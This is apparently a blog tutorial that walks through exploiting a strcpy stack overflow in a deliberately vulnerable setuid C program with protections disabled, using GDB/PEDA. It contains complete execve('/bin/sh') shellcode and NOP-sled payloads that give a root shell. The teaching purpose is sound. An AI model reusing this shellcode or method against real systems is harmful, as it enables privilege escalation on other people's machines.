Introduction to buffer overflows

Published on Sunday, 24 February 2013 in Security; tagged with stack, shellcode, gdb, exploit, buffer, aslr, peda, bof, overflow, exec, security

Before starting

I know buffer overflows are hardly a hot new topic, but the subject is so vast that I really wanted to write something about it.

Thanks to the Most Expensive One-Byte Mistake, the NUL byte that marks the end of C strings opens up a whole new world.
By taking advantage of naive functions like strcpy, we will be able to exploit a famous security flaw.
This flaw is called a buffer overflow, and it is the topic of this paper.

I'm writing this more as a reminder for myself than as a fully documented expert paper, but I hope it will help you.

Vulnerable program

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
    char buffer[256] = {0};

    if (argc < 2) {
        printf("Usage: %s username\n", argv[0]);
        exit(1);
    }

    /* strcpy doesn't check the size of the destination buffer */
    strcpy(buffer, argv[1]);
    printf("Your username is: %s\n", buffer);

    return 0;
}

The program above will be our example throughout this paper.
It simply takes a username as argument and prints it (useless, I know).

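Here, the problem is that strcpy doesn't check whether the source string fits in the destination buffer: it keeps copying until it reaches the NUL byte of the source.
If the username is 256 characters or longer, the copy runs past the end of buffer and overwrites whatever follows it on the stack. That's the buffer overflow.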
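
To make this concrete, here is a small toy model in Python 3 (the paper itself uses python2.7 one-liners). It is only a sketch: a bytearray stands in for the stack frame, and I assume the saved return address sits right after the 256-byte buffer, which is a simplification (the real frame also holds saved registers in between). The names make_frame, unchecked_copy and saved_return_address are made up for the illustration.

```python
import struct

BUFFER_SIZE = 256           # char buffer[256]
RETURN_SLOT = BUFFER_SIZE   # assumption: return address stored right after the buffer


def make_frame(return_address: int) -> bytearray:
    """Build a toy frame: an empty buffer followed by a 4-byte return address."""
    frame = bytearray(BUFFER_SIZE + 4)
    frame[RETURN_SLOT:RETURN_SLOT + 4] = struct.pack("<I", return_address)
    return frame


def unchecked_copy(frame: bytearray, src: bytes) -> None:
    """Mimic strcpy: copy src plus a terminating NUL without checking BUFFER_SIZE."""
    data = src + b"\x00"
    if len(data) > len(frame):
        # Model the memory located beyond our toy frame.
        frame.extend(bytes(len(data) - len(frame)))
    frame[0:len(data)] = data


def saved_return_address(frame: bytearray) -> int:
    """Read back the 4-byte little-endian value stored in the return slot."""
    return struct.unpack("<I", frame[RETURN_SLOT:RETURN_SLOT + 4])[0]
```

With a 20-character username the return slot is untouched. With exactly 256 characters the terminating NUL already lands on its first byte, and with 256 'A's followed by 'BBBB' the slot reads back as 0x42424242.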

But first, we have to remove some protections.
Current operating systems and compilers add security mechanisms to mitigate this problem.
So, to be able to exploit our buffer overflow, I will disable them.

But don't think that these protections make this kind of flaw unexploitable! (see More?)
Our case is just a simple example to understand the process, but some exploits are clever enough to bypass these protections.

depierre$ sudo bash -c "echo 0 > /proc/sys/kernel/randomize_va_space"
depierre$ gcc -fno-stack-protector -z execstack -m32 -o vulnerable_prog vulnerable_prog.c
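  1. the first line disables ASLR, which randomizes the addresses of the stack, heap and libraries
  2. -fno-stack-protector disables the stack canary, so overwriting the saved return address goes undetected
  3. -z execstack marks the stack as executable
  4. -m32 builds a 32-bit binary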
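
If you want to check the ASLR setting before going further, a sketch along these lines can help. It is written in Python 3, it is Linux-only, and the helper names describe_aslr and current_aslr are mine; the meaning of the values 0, 1 and 2 is the one given by the kernel's sysctl documentation.

```python
from pathlib import Path

ASLR_FILE = Path("/proc/sys/kernel/randomize_va_space")  # Linux only

ASLR_MODES = {
    0: "disabled",
    1: "stack, mmap base and VDSO randomized",
    2: "same as 1, plus the heap (brk)",
}


def describe_aslr(raw: str) -> str:
    """Turn the content of randomize_va_space into a readable description."""
    value = int(raw.strip())
    return ASLR_MODES.get(value, "unknown value %d" % value)


def current_aslr():
    """Describe this machine's setting, or return None if it cannot be read."""
    try:
        return describe_aslr(ASLR_FILE.read_text())
    except (OSError, ValueError):
        return None
```

After the echo 0 command above, current_aslr() should report "disabled".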

We also make the vulnerable program setuid (i.e. chmod +s).
Since it is owned by root in our example, a shell spawned from it will run with root's rights.

Also, in this paper, I'm using a method which requires the stack to be executable.
You can check it using readelf as shown below.

depierre$ readelf -l vulnerable_prog

Elf file type is EXEC (Executable file)
Entry point 0x8048360
There are 8 program headers, starting at offset 52

Program Headers:
  Type           Offset   VirtAddr   PhysAddr   FileSiz MemSiz  Flg Align
  PHDR           0x000034 0x08048034 0x08048034 0x00100 0x00100 R E 0x4
  INTERP         0x000134 0x08048134 0x08048134 0x00013 0x00013 R   0x1
      [Requesting program interpreter: /lib/]
  LOAD           0x000000 0x08048000 0x08048000 0x00680 0x00680 R E 0x1000
  LOAD           0x000680 0x08049680 0x08049680 0x00120 0x00124 RW  0x1000
  DYNAMIC        0x00068c 0x0804968c 0x0804968c 0x000e8 0x000e8 RW  0x4
  NOTE           0x000148 0x08048148 0x08048148 0x00044 0x00044 R   0x4
  GNU_EH_FRAME   0x00059c 0x0804859c 0x0804859c 0x0002c 0x0002c R   0x4
  GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RWE 0x4

 Section to Segment mapping:
  Segment Sections...
   01     .interp
   02     .interp .note.ABI-tag .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rel.dyn .rel.plt .init .plt .text .fini .rodata .eh_frame_hdr .eh_frame
   03     .init_array .fini_array .jcr .dynamic .got .got.plt .data .bss
   04     .dynamic
   05     .note.ABI-tag
   06     .eh_frame_hdr

GNU_STACK describes the stack of the program and, as you can see from its RWE flags, it is executable (E).
If it weren't, we couldn't use this method here.
Other techniques work with a non-executable stack, and maybe I'll write something about them later.
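
The same check can be scripted. The sketch below (Python 3) only parses text that readelf -l has already printed; it assumes the one-line-per-header layout of a 32-bit binary as shown above, and gnu_stack_flags is a name I made up.

```python
def gnu_stack_flags(readelf_output: str):
    """Return the flag letters of the GNU_STACK header, or None if it is absent."""
    for line in readelf_output.splitlines():
        fields = line.split()
        if fields and fields[0] == "GNU_STACK":
            # Columns: Type, Offset, VirtAddr, PhysAddr, FileSiz, MemSiz, flags..., Align
            # The flags may be split by spaces (e.g. "R E"), so join what lies in between.
            return "".join(fields[6:-1])
    return None


SAMPLE = "  GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RWE 0x4"
print("executable stack:", "E" in gnu_stack_flags(SAMPLE))
```

A binary built without -z execstack would typically show RW here instead of RWE.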

Now let's focus and try different inputs.

depierre$ ./vulnerable_prog $(python2.7 -c "print 'A'*20")

Since the username fits within the 256-byte buffer, everything is OK.

depierre$ ./vulnerable_prog $(python2.7 -c "print 'A'*300")
Segmentation fault (core dumped)

As you can see, with a username of 300 'A's, the program was killed by a SIGSEGV (segmentation fault).
Here is the buffer overflow.

Find the offset of the buffer

To see what happens inside the program, I use GDB with PEDA.

Knowing that strcpy is the root of the buffer overflow, I break on its call.

gdb-peda$ pset arg "'A'*4"
gdb-peda$ dis main
Dump of assembler code for function main:
   0x0804845c <+0>: push   ebp
   0x0804845d <+1>: mov    ebp,esp
   0x0804845f <+3>: push   edi
   0x08048460 <+4>: push   ebx
   0x08048461 <+5>: and    esp,0xfffffff0
   0x08048464 <+8>: sub    esp,0x110
   0x0804846a <+14>:    lea    ebx,[esp+0x10]
   0x0804846e <+18>:    mov    eax,0x0
   0x08048473 <+23>:    mov    edx,0x40
   0x08048478 <+28>:    mov    edi,ebx
   0x0804847a <+30>:    mov    ecx,edx
   0x0804847c <+32>:    rep stos DWORD PTR es:[edi],eax
   0x0804847e <+34>:    cmp    DWORD PTR [ebp+0x8],0x1
   0x08048482 <+38>:    jg     0x80484a5 <main+73>
   0x08048484 <+40>:    mov    eax,DWORD PTR [ebp+0xc]
   0x08048487 <+43>:    mov    eax,DWORD PTR [eax]
   0x08048489 <+45>:    mov    DWORD PTR [esp+0x4],eax
   0x0804848d <+49>:    mov    DWORD PTR [esp],0x8048570
   0x08048494 <+56>:    call   0x8048310 <printf@plt>
   0x08048499 <+61>:    mov    DWORD PTR [esp],0x1
   0x080484a0 <+68>:    call   0x8048340 <exit@plt>
   0x080484a5 <+73>:    mov    eax,DWORD PTR [ebp+0xc]
   0x080484a8 <+76>:    add    eax,0x4
   0x080484ab <+79>:    mov    eax,DWORD PTR [eax]
   0x080484ad <+81>:    mov    DWORD PTR [esp+0x4],eax
   0x080484b1 <+85>:    lea    eax,[esp+0x10]
   0x080484b5 <+89>:    mov    DWORD PTR [esp],eax
   0x080484b8 <+92>:    call   0x8048320 <strcpy@plt>
   0x080484bd <+97>:    lea    eax,[esp+0x10]
   0x080484c1 <+101>:   mov    DWORD PTR [esp+0x4],eax
   0x080484c5 <+105>:   mov    DWORD PTR [esp],0x8048584
   0x080484cc <+112>:   call   0x8048310 <printf@plt>
   0x080484d1 <+117>:   mov    eax,0x0
   0x080484d6 <+122>:   lea    esp,[ebp-0x8]
   0x080484d9 <+125>:   pop    ebx
   0x080484da <+126>:   pop    edi
   0x080484db <+127>:   pop    ebp
   0x080484dc <+128>:   ret
End of assembler dump.
gdb-peda$ break *0x80484b8
Breakpoint 1 at 0x80484b8
gdb-peda$ r
Starting program: vulnerable_prog 'AAAA'
EAX: 0xffffd650 --> 0x0
EBX: 0xffffd650 --> 0x0
ECX: 0x0
EDX: 0x40 ('@')
ESI: 0x0
EDI: 0xffffd740 --> 0xf7fa4000 --> 0x1acd9c
EBP: 0xffffd748 --> 0x0
ESP: 0xffffd630 --> 0xffffd650 --> 0x0
EIP: 0x80484b8 (<main+92>:  call   0x8048320 <strcpy@plt>)
EFLAGS: 0x286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
   0x80484ad <main+81>: mov    DWORD PTR [esp+0x4],eax
   0x80484b1 <main+85>: lea    eax,[esp+0x10]
   0x80484b5 <main+89>: mov    DWORD PTR [esp],eax
=> 0x80484b8 <main+92>: call   0x8048320 <strcpy@plt>
   0x80484bd <main+97>: lea    eax,[esp+0x10]
   0x80484c1 <main+101>:    mov    DWORD PTR [esp+0x4],eax
   0x80484c5 <main+105>:    mov    DWORD PTR [esp],0x8048584
   0x80484cc <main+112>:    call   0x8048310 <printf@plt>
Guessed arguments:
arg[0]: 0xffffd650 --> 0x0
arg[1]: 0xffffd991 ('AAAA')
0000| 0xffffd630 --> 0xffffd650 --> 0x0
0004| 0xffffd634 --> 0xffffd991 ('AAAA')
0008| 0xffffd638 --> 0x8048258 ("__libc_start_main")
0012| 0xffffd63c --> 0xf7e04374 --> 0x72647800 ('')
0016| 0xffffd640 --> 0x0
0020| 0xffffd644 --> 0x0
0024| 0xffffd648 --> 0x0
0028| 0xffffd64c --> 0x0
Legend: code, data, rodata, value

Breakpoint 1, 0x080484b8 in main ()

The first parameter of strcpy is the destination buffer and the second one is the source.

Just before the call, the parameters are placed on the stack from the last one to the first.
So if we look at the stack, the top contains the address of the buffer, 0xffffd650.

Now let's find out how long the input must be to redirect EIP.

Where are you, EIP? Don't be afraid!

Let's start again with GDB and PEDA.

gdb-peda$ pset arg 'cyclic_pattern(300)'
gdb-peda$ break main
Breakpoint 1 at 0x8048461
gdb-peda$ r
Starting program: vulnerable_prog 'A%sA%nA%(A%)A%;A%0A%1A%2A%3A%4A%5A%6A%7A%8A%9A$sA$nA$(A$)A$;A$0A$1A$2A$3A$4A$5A$6A$7A$8A$9A-sA-nA-(A-)A-;A-0A-1A-2A-3A-4A-5A-6A-7A-8A-9AasAanAa(Aa)Aa;Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9AbsAbnAb(Ab)Ab;Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9AcsAcnAc(Ac)Ac;Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9AdsAdnAd(Ad)Ad;Ad0Ad1Ad2Ad3Ad4'

pset arg 'cyclic_pattern(300)' is a PEDA command which sets the program's argument to a generated pattern 300 characters long.
The wonderful thing here is that we don't have to brute-force the length of the input to find when the program crashes, because the command pattern_search will tell us everything!
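
If you wonder how such a pattern can reveal an offset, here is a minimal sketch in Python 3. It is not PEDA's algorithm: I use the simpler "Aa0Aa1Aa2..." scheme instead, and the names pattern_create and pattern_offset are mine. The idea is the same though: short windows of the pattern do not repeat (at least for the lengths used here), so the 4 bytes that end up in a register tell you where they came from.

```python
import itertools
import string
import struct


def pattern_create(length: int) -> str:
    """Build 'Aa0Aa1Aa2...' truncated to the requested length."""
    triplets = (
        upper + lower + digit
        for upper in string.ascii_uppercase
        for lower in string.ascii_lowercase
        for digit in string.digits
    )
    pattern = "".join(itertools.islice(triplets, (length + 2) // 3))
    if len(pattern) < length:
        raise ValueError("requested length is too large for this scheme")
    return pattern[:length]


def pattern_offset(pattern: str, register_value: int) -> int:
    """Locate the 4 bytes seen in a 32-bit register inside the pattern (-1 if absent)."""
    # x86 is little-endian, so the register's low byte is the first character.
    needle = struct.pack("<I", register_value).decode("latin-1")
    return pattern.find(needle)
```

The little-endian step is also why a register value such as 0x64413963 is displayed by PEDA as 'c9Ad'.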

gdb-peda$ continue
Your username is: A%sA%nA%(A%)A%;A%0A%1A%2A%3A%4A%5A%6A%7A%8A%9A$sA$nA$(A$)A$;A$0A$1A$2A$3A$4A$5A$6A$7A$8A$9A-sA-nA-(A-)A-;A-0A-1A-2A-3A-4A-5A-6A-7A-8A-9AasAanAa(Aa)Aa;Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9AbsAbnAb(Ab)Ab;Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9AcsAcnAc(Ac)Ac;Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9AdsAdnAd(Ad)Ad;Ad0Ad1Ad2Ad3Ad4

Program received signal SIGSEGV, Segmentation fault.
EAX: 0x0
EBX: 0x63413563 ('c5Ac')
ECX: 0x0
EDX: 0x0
ESI: 0x0
EDI: 0x37634136 ('6Ac7')
EBP: 0x41386341 ('Ac8A')
ESP: 0xffffd750 ("sAdnAd(Ad)Ad;Ad0Ad1Ad2Ad3Ad4")
EIP: 0x64413963 ('c9Ad')
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
Invalid $PC address: 0x64413963
0000| 0xffffd750 ("sAdnAd(Ad)Ad;Ad0Ad1Ad2Ad3Ad4")
0004| 0xffffd754 ("Ad(Ad)Ad;Ad0Ad1Ad2Ad3Ad4")
0008| 0xffffd758 ("d)Ad;Ad0Ad1Ad2Ad3Ad4")
0012| 0xffffd75c (";Ad0Ad1Ad2Ad3Ad4")
0016| 0xffffd760 ("Ad1Ad2Ad3Ad4")
0020| 0xffffd764 ("d2Ad3Ad4")
0024| 0xffffd768 ("3Ad4")
0028| 0xffffd76c --> 0x0
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x64413963 in ?? ()

Looking at the registers, we can see that EBX has been overwritten, as have EDI and EBP, that ESP points into our pattern and, last but not least, that EIP contains part of it!

Well, in fact, we didn't overwrite EIP directly but the return address saved on the stack, which then ends up in EIP.
If your knowledge of the stack is light, you just have to remember one thing.

When a program enters a function, it has to remember where it came from. So the CALL instruction pushes the return address onto the stack.
Then, when it leaves the function (when it reaches a RET instruction), that value is popped from the top of the stack (where ESP points) into EIP.
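
This CALL/RET mechanism can be mimicked in a few lines of Python 3. It is a toy model only: a list plays the role of the stack, and the ToyCpu class is something I invented for the illustration.

```python
class ToyCpu:
    """Toy model of CALL/RET: a Python list plays the role of the stack."""

    def __init__(self, eip: int):
        self.eip = eip
        self.stack = []  # last element = top of the stack (where ESP points)

    def call(self, target: int, return_address: int) -> None:
        self.stack.append(return_address)  # CALL pushes the return address
        self.eip = target                  # then jumps to the function

    def ret(self) -> None:
        self.eip = self.stack.pop()        # RET pops the top of the stack into EIP


cpu = ToyCpu(0x80484b8)
cpu.call(0x8048320, 0x80484bd)
cpu.stack[-1] = 0x64413963  # what an overflow does to the saved return address
cpu.ret()
print(hex(cpu.eip))
```

Whoever controls the value sitting in that stack slot when RET executes controls where the program goes next.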

But here, EIP doesn't contain a valid address but 0x64413963.
Knowing what's on the stack, we have to find how long the input must be to reach the saved return address.

gdb-peda$ pattern_search
Registers contain pattern buffer
EIP+0 found at offset: 268
EBX+0 found at offset: 256
EDI+0 found at offset: 260
EBP+0 found at offset: 264
Registers point to pattern buffer
[ESP] points to pattern offset: 272
Start of pattern buffer "A%sA" found at:
0xf7fd9012 (mapped)
0xffffd640 : $sp + -0x110 (-68 dwords)
0xffffd98f : $sp + 0x23f (143 dwords)
References to start of pattern buffer "A%sA" found at:
0xffffd620 : $sp + -0x130 (-76 dwords)
0xffffd628 : $sp + -0x128 (-74 dwords)
0xffffd634 : $sp + -0x11c (-71 dwords)
0xffffd7e8 : $sp + 0x98 (38 dwords)

See? pattern_search gives us all the information we need!
To overwrite EIP, we read the line about EIP: it was found at offset 268.
So after 268 bytes, the next 4 will overwrite EIP.
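
These offsets are not magic: they follow from the layout of the frame. As a sketch in Python 3, assuming (as the pattern_search output suggests for this build) that the saved EBX, EDI, EBP and the return address directly follow the 256-byte buffer, 4 bytes each:

```python
BUFFER_SIZE = 256  # char buffer[256]
WORD = 4           # size of a 32-bit register

# Order taken from the pattern_search output: EBX, EDI, EBP, then the return address.
SAVED_SLOTS = ["EBX", "EDI", "EBP", "EIP"]


def slot_offsets(buffer_size: int = BUFFER_SIZE) -> dict:
    """Offset from the start of the buffer of each saved 4-byte slot."""
    return {name: buffer_size + i * WORD for i, name in enumerate(SAVED_SLOTS)}


for name, offset in slot_offsets().items():
    print(name, offset)
```

Another compiler or another set of options could add padding or save different registers, so always trust what the debugger reports over this kind of arithmetic.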

Let's try with a simpler input.

gdb-peda$ pset arg "'A'*268 + 'B'*4"
gdb-peda$ r

Program received signal SIGSEGV, Segmentation fault.
EAX: 0x0
EBX: 0x41414141 ('AAAA')
ECX: 0x0
EDX: 0x0
ESI: 0x0
EDI: 0x41414141 ('AAAA')
EBP: 0x41414141 ('AAAA')
ESP: 0xffffd760 --> 0x0
EIP: 0x42424242 ('BBBB')
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
Invalid $PC address: 0x42424242
0000| 0xffffd760 --> 0x0
0004| 0xffffd764 --> 0xffffd7f4 --> 0xffffd96f ("vulnerable_prog")
0008| 0xffffd768 --> 0xffffd800 --> 0xffffdabc ("XDG_VTNR=1")
0012| 0xffffd76c --> 0xf7ffcfc0 --> 0x20ef8
0016| 0xffffd770 --> 0x2f ('/')
0020| 0xffffd774 --> 0x0
0024| 0xffffd778 --> 0xf7fda2e8 --> 0xf7df7000 --> 0x464c457f
0028| 0xffffd77c --> 0x2
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x42424242 in ?? ()

As shown above, EBX, EDI and EBP are overwritten by the As, and then EIP is overwritten by the Bs.

To exploit the buffer overflow, we will redirect EIP to a shellcode which will open a new shell.
This shell will have the rights of the owner of the program (thanks to chmod +s), in our case root.

There are plenty of places where the shellcode can be stored. For instance, you can save it in an environment variable.
Here, I will write it directly into the buffer and redirect EIP to its beginning.


As we know, after writing 268 bytes in the buffer, the next 4 bytes will overwrite EIP.
That's where we will write the address pointing to the beginning of the buffer.
We will pad the first bytes with '\x90' (i.e. the NOP instruction), write the shellcode, pad with some NOPs again and finally append the address several times.

Therefore we have:

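'\x90' * 100
'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80'
'\x90' * 63
'\x50\xd6\xff\xff' * 22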

I write 63 NOPs after the shellcode in order to pad the buffer but also to align the address saved on the stack.
As you can see below, if I only write 62 NOPs, EIP will not point where we want.
The last line of the payload is the address repeated 22 times.
If you're wondering why it is written backwards, it's because x86 is little-endian: the least significant byte is stored first, so the most significant byte ends up on the right.
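
Rather than reversing the bytes by hand, you can let Python's struct module do it. A minimal sketch in Python 3 (pack_address is just a name I chose):

```python
import struct


def pack_address(address: int) -> bytes:
    """Encode a 32-bit address the way x86 stores it in memory (little-endian)."""
    return struct.pack("<I", address)


print(pack_address(0xffffd650))           # little-endian, as used in the payload
print(struct.pack(">I", 0xffffd650))      # big-endian, for comparison
```

The "<" in the format string asks for little-endian and "I" for an unsigned 32-bit integer; the first call gives the bytes 50 d6 ff ff, which is exactly the '\x50\xd6\xff\xff' used above.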

gdb-peda$ pset arg "'\x90'*100 + '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80' + '\x90'*62 + '\x50\xd6\xff\xff'*22"
gdb-peda$ r
Your username is:                                                                                                     1 Ph//shh/bin  P  S
                                                                                                                   P   P   P   P   P   P   P   P   P   P   P   P   P   P   P   P   P   P   P   P   P   P
Program received signal SIGSEGV, Segmentation fault.
EAX: 0x0
EBX: 0x50ffffd6
ECX: 0x0
EDX: 0x0
ESI: 0x0
EDI: 0x50ffffd6
EBP: 0x50ffffd6
ESP: 0xffffd760 --> 0xffffd6
EIP: 0x50ffffd6
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
Invalid $PC address: 0x50ffffd6
0000| 0xffffd760 --> 0xffffd6
0004| 0xffffd764 --> 0xffffd7f4 --> 0xffffd96e ("vulnerable_prog")
0008| 0xffffd768 --> 0xffffd800 --> 0xffffdabe ("XDG_VTNR=1")
0012| 0xffffd76c --> 0xf7ffcfc0 --> 0x20ef8
0016| 0xffffd770 --> 0x2a ('*')
0020| 0xffffd774 --> 0x0
0024| 0xffffd778 --> 0xf7fda2e8 --> 0xf7df7000 --> 0x464c457f
0028| 0xffffd77c --> 0x2
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x50ffffd6 in ?? ()

As you can see, EIP doesn't contain 0xffffd650 but 0x50ffffd6.

gdb-peda$ x/300x $esp
0xffffd640: 0xffffd650  0xffffd9aa  0x08048258  0xf7e04374
0xffffd650: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffd660: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffd670: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffd680: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffd690: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffd6a0: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffd6b0: 0x90909090  0x6850c031  0x68732f2f  0x69622f68
0xffffd6c0: 0x50e3896e  0x8953e289  0xcd0bb0e1  0x90909080
0xffffd6d0: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffd6e0: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffd6f0: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffd700: 0x90909090  0x90909090  0x50909090  0x50ffffd6
0xffffd710: 0x50ffffd6  0x50ffffd6  0x50ffffd6  0x50ffffd6
0xffffd720: 0x50ffffd6  0x50ffffd6  0x50ffffd6  0x50ffffd6
0xffffd730: 0x50ffffd6  0x50ffffd6  0x50ffffd6  0x50ffffd6
0xffffd740: 0x50ffffd6  0x50ffffd6  0x50ffffd6  0x50ffffd6
0xffffd750: 0x50ffffd6  0x50ffffd6  0x50ffffd6  0x50ffffd6
0xffffd760: 0x00ffffd6  0xffffd7f4  0xffffd800  0xf7ffcfc0
0xffffd770: 0x0000002a  0x00000000  0xf7fda2e8  0x00000002
0xffffd780: 0xffffd7f0  0xf7fa4000  0x00000000  0x00000000
0xffffd790: 0x00000000  0x8d59600b  0xb0f8641b  0x00000000
0xffffd7a0: 0x00000000  0x00000000  0x00000002  0x08048360
0xffffd7b0: 0x00000000  0xf7ff0c70  0xf7e10739  0xf7ffcfc0

So, with 63 NOPs instead of 62, the repeated address is aligned and EIP will contain 0xffffd650.
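
The alignment issue can be reproduced without running the program at all. The sketch below (Python 3) rebuilds the payload and looks at the 4 bytes sitting at offset 268, i.e. the ones that end up in EIP. The shellcode bytes and the address are the ones from this paper; build_payload and value_loaded_into_eip are names I made up.

```python
import struct

# Same 25 bytes as the shellcode used in this paper.
SHELLCODE = bytes.fromhex("31c050682f2f7368682f62696e89e35089e25389e1b00bcd80")
RET_OFFSET = 268        # offset of the saved return address (from pattern_search)
ADDRESS = 0xffffd650    # address of the buffer as seen in GDB


def build_payload(nops_before: int, nops_after: int, address: int, repeats: int) -> bytes:
    """NOP sled + shellcode + NOP padding + little-endian address repeated."""
    return (
        b"\x90" * nops_before
        + SHELLCODE
        + b"\x90" * nops_after
        + struct.pack("<I", address) * repeats
    )


def value_loaded_into_eip(payload: bytes) -> int:
    """Interpret the 4 bytes at the return-address offset as RET would."""
    return struct.unpack("<I", payload[RET_OFFSET:RET_OFFSET + 4])[0]


print(hex(value_loaded_into_eip(build_payload(100, 62, ADDRESS, 22))))
print(hex(value_loaded_into_eip(build_payload(100, 63, ADDRESS, 22))))
```

With 63 NOPs the repeated addresses start at offset 100 + 25 + 63 = 188, a multiple of 4, so one of them falls exactly on offset 268. With 62 NOPs everything is shifted by one byte and EIP receives a mix of two consecutive copies.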

Exploit time!

Let's try with our correct buffer input.

gdb-peda$ pset arg "'\x90'*100 + '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80' + '\x90'*63 + '\x50\xd6\xff\xff'*22"
gdb-peda$ r
Starting program: vulnerable_prog '                                                                                                    1 Ph//shh/bin  P  S
                                                                                                                                                                                            `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   '
Your username is:                         1 Ph//shh/bin  P  S
                                                                                                                               `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `
process 27403 is executing new program: /bin/sh

As expected, vulnerable_prog has started a new shell, /bin/sh.
Our gate is now open!

Let's try outside GDB.

depierre$ ./vulnerable_prog $(python2.7 -c "print '\x90'*24 + '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80' + '\x90'*63 + '\x50\xd6\xff\xff'*40")
Your username is:                         1 Ph//shh/bin  P  S
                                                                                                                               `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `
Segmentation fault (core dumped)

Well well well, it failed.

I asked some friends why our exploit works in GDB but not outside.
The reason is that the stack is not laid out exactly the same way when the program runs under GDB.
For instance, GDB runs the program with a slightly different environment (extra variables, a different path for the program name), and since all of that lives on the stack, the address of our buffer shifts.

Moreover, if we hadn't disabled the operating system's protection, the address in our payload would have been wrong too, because stack addresses would have been randomized by ASLR.
Now you understand why I had to disable it before exploiting the buffer overflow.

Fix the shellcode

You might still be wondering why I wrote 100 NOPs at the beginning of the buffer, and now it's time to tell you.

Here, we are just dealing with the address shift introduced by GDB (ASLR is disabled).
So one solution is to pad the beginning of the buffer with NOPs in order to have a bigger area to aim at, and to change the address so that it points inside that area rather than at its very beginning.
Then, we extend our payload by repeating the address more times (40 instead of 22).

With these modifications, the exploit still works if the buffer is shifted a little.
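
How much of a shift can the NOPs absorb? Here is a rough estimate in Python 3, assuming the buffer starts at 0xffffd650 under GDB (the value seen earlier) and that landing anywhere in the 100 NOPs, or on the first byte of the shellcode, is fine. tolerated_shift is a hypothetical helper, not part of any tool.

```python
def tolerated_shift(buffer_in_gdb: int, target: int, sled_length: int):
    """Return (lowest, highest) shift of the buffer address for which `target`
    still lands in the NOP sled or on the first byte of the shellcode."""
    offset_in_sled = target - buffer_in_gdb
    if not 0 <= offset_in_sled <= sled_length:
        raise ValueError("target is outside the sled even without any shift")
    # The buffer may move up until its start reaches the target, and down
    # until the first shellcode byte reaches the target.
    return offset_in_sled - sled_length, offset_in_sled


print(tolerated_shift(0xffffd650, 0xffffd6a4, 100))
print(tolerated_shift(0xffffd650, 0xffffd650, 100))
```

Aiming at 0xffffd6a4 (84 bytes into the sled) tolerates the buffer moving up by as much as 84 bytes, whereas aiming at the very first byte tolerates no move towards higher addresses at all.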

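'\x90' * 100
'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80'
'\x90' * 63
'\xa4\xd6\xff\xff' * 40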

Let's try one more time with our new shellcode.

depierre$ whoami
depierre$ ./vulnerable_prog $(python2.7 -c "print '\x90'*100 + '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80' + '\x90'*63 + '\xa4\xd6\xff\xff'*40")
Your username is:                                                                                                     1 Ph//shh/bin  P  S

sh-4.2$ whoami

Here we are! We now have a root shell on the computer thanks to a buffer overflow in the program.

I hope you enjoyed it as much as I did when I exploited my first buffer overflow.

I know this paper doesn't go very deep into the topic, but at least it has shown some of its aspects.
Also, as I said, I've written this more as a reminder than anything else.

More? License WTFPL2